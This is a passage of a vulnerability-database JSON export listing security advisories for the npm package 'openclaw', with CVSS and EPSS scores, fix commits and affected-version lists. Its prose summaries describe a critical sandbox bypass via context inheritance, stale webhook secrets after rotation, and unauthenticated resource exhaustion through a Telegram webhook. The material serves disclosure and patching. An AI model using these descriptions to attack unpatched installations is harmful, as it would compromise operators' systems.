ID-arks-g6hw-abbw"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dqb2-dej7-augt"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-wyat-1259-2kg9"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"}],"aliases":["CVE-2026-42427","GHSA-7437-7hg8-frrw"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulner
abilities/VCID-3zwq-dz2u-pqgv"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90172?format=json","vulnerability_id":"VCID-3zx4-t8cj-kbfn","summary":"OpenClaw: Heartbeat context inheritance bypasses sandbox via senderIsOwner escalation\n## Summary\nHeartbeat context inheritance bypasses sandbox via senderIsOwner escalation\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: Critical\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `a30214a624946fc5c85c9558a27c1580172374fd` — 2026-03-31T09:06:51+09:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41329","reference_id":"","reference_type":"","scores":[{"value":"0.0005","scoring_system":"epss","scoring_elements":"0.15986","published_at":"2026-06-07T12:55:00Z"},{"value":"0.0005","scoring_system":"epss","scoring_elements":"0.1603","published_at":"2026-06-06T12:55:00Z"},{"value":"0.0005","scoring_system":"epss","scoring_elements":"0.1604","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41329"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"9.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/a30214a624946fc5c85c9558a27c1580172374fd","reference_id":"","reference_type":"","scores":[{"value":"9.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"9","scoring_system":"cvssv4","scoring
_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"9.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T19:38:10Z/"}],"url":"https://github.com/openclaw/openclaw/commit/a30214a624946fc5c85c9558a27c1580172374fd"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"9.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-g5cg-8x5w-7jpm","reference_id":"","reference_type":"","scores":[{"value":"9.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"9.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T19:38:10Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-g5cg-8x5w-7jpm"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41329","reference_id":"CVE-2026-41329","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41329"},{"reference_url":"https://github.com/advisori
es/GHSA-g5cg-8x5w-7jpm","reference_id":"GHSA-g5cg-8x5w-7jpm","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-g5cg-8x5w-7jpm"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-sandbox-bypass-via-heartbeat-context-inheritance-and-senderisowner-escalation","reference_id":"openclaw-sandbox-bypass-via-heartbeat-context-inheritance-and-senderisowner-escalation","reference_type":"","scores":[{"value":"9.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T19:38:10Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-sandbox-bypass-via-heartbeat-context-inheritance-and-senderisowner-escalation"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-
fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-
xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41329","GHSA-g5cg-8x5w-7jpm"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-3zx4-t8cj-kbfn"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/95449?format=json","vulnerability_id":"VCID-4316-7q9a-xuhx","summary":"OpenClaw's Webhooks SecretRef route secret remains valid after rotation/reload\n## Summary\n\nOpenClaw webhooks allowed route secrets to be backed by `SecretRef` values, but cached the resolved secret for a route. 
After an operator rotated the underlying secret and ran `openclaw secrets reload`, the previous resolved webhook secret could remain valid until the plugin or gateway restarted.\n\n## Impact\n\nAn attacker who already had a previously valid webhook route secret could continue authenticating webhook requests after the operator rotated the secret and reloaded secrets. This weakened credential rotation for webhook routes and could allow continued invocation of the configured webhook task flow until restart.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` on npm\n- Affected: versions before `2026.4.23`\n- Fixed: `2026.4.23`\n- Latest stable verified fixed: `openclaw@2026.4.23`, tag `v2026.4.23`\n\n## Fix\n\nWebhook route authentication now resolves `SecretRef`-backed route secrets on each request. A rotated secret becomes effective after `openclaw secrets reload` without requiring a gateway or plugin restart, and the old secret is rejected.\n\n## Fix Commit(s)\n\n- `36c4a372a0ad5dca8bfc0d93f7aab9c2f2de66fa` (`fix(webhooks): reload route secrets per request`)\n\n## Severity\n\nSeverity remains `medium`. 
The attack requires possession of a previously valid route secret, but the stale credential can continue to authorize webhook actions after rotation.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-45005","reference_id":"","reference_type":"","scores":[{"value":"0.00056","scoring_system":"epss","scoring_elements":"0.17844","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00056","scoring_system":"epss","scoring_elements":"0.17878","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00056","scoring_system":"epss","scoring_elements":"0.17882","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-45005"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/36c4a372a0ad5dca8bfc0d93f7aab9c2f2de66fa","reference_id":"","reference_type":"","scores":[{"value":"6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:L"},{"value":"6.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:L"},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-12T16:10:40Z/"}],"url":"https://github.com/openclaw/openclaw/commit/36c4a372a0ad5dca8bfc0d93f7aab9c2f2de66fa"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-q8ff-7ffm-m3r9","reference_id":"","reference_type":"","scores":[{"value":"6","scoring_system":"cvssv3.1","sc
oring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:L"},{"value":"6.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-12T16:10:40Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-q8ff-7ffm-m3r9"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-45005","reference_id":"","reference_type":"","scores":[{"value":"6.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-45005"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-webhook-route-secret-cache-not-invalidated-after-rotation","reference_id":"","reference_type":"","scores":[{"value":"6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:L"},{"value":"6.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:L"},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-12T16:10:40Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-webhook-route-secret-cache-not-invalidated-after-rotation"},{"reference_url":"https://github.com/advisories/GHSA-q8ff-7ffm-m3r9","reference_id":"GHSA-q8ff-7ffm-m3r9","reference_type":"","scores":[{"value":"MODER
ATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-q8ff-7ffm-m3r9"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114733?format=json","purl":"pkg:npm/openclaw@2026.4.23","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.23"}],"aliases":["CVE-2026-45005","GHSA-q8ff-7ffm-m3r9"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-4316-7q9a-xuhx"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91826?format=json","vulnerability_id":"VCID-44hp-3xh1-uyen","summary":"Duplicate Advisory: OpenClaw Telegram webhook request bodies were read before secret validation, enabling unauthenticated resource exhaustion\n## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of GHSA-jq3f-vjww-8rq7. This link is maintained to preserve external references.\n\n## Original Description\nOpenClaw before 2026.3.13 reads and buffers Telegram webhook request bodies before validating the x-telegram-bot-api-secret-token header, allowing unauthenticated attackers to exhaust server resources. 
Attackers can send POST requests to the webhook endpoint to force memory consumption, socket time, and JSON parsing work before authentication validation occurs.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/7e49e98f79073b11134beac27fdff547ba5a4a02","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/7e49e98f79073b11134beac27fdff547ba5a4a02"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-jq3f-vjww-8rq7","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-jq3f-vjww-8rq7"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32980","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"gene
ric_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32980"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-resource-exhaustion-via-unauthenticated-telegram-webhook-request","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-resource-exhaustion-via-unauthenticated-telegram-webhook-request"},{"reference_url":"https://github.com/advisories/GHSA-c447-w54g-f55j","reference_id":"GHSA-c447-w54g-f55j","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-c447-w54g-f55j"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/984793?format=json","purl":"pkg:npm/openclaw@2026.3.13-beta.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerabi
lity":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerabi
lity":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"V